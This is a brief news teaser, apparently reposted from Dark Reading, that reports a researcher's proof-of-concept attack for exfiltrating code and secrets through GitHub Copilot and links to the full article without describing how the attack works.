While GitHub has advanced protections for its built-in AI agent, a researcher came up with a creative proof-of-concept (PoC) attack for exfiltrating code and secrets via Copilot.
First seen on darkreading.com
Jump to article: www.darkreading.com/application-security/github-copilot-camoleak-ai-attack-exfils-data
![]()

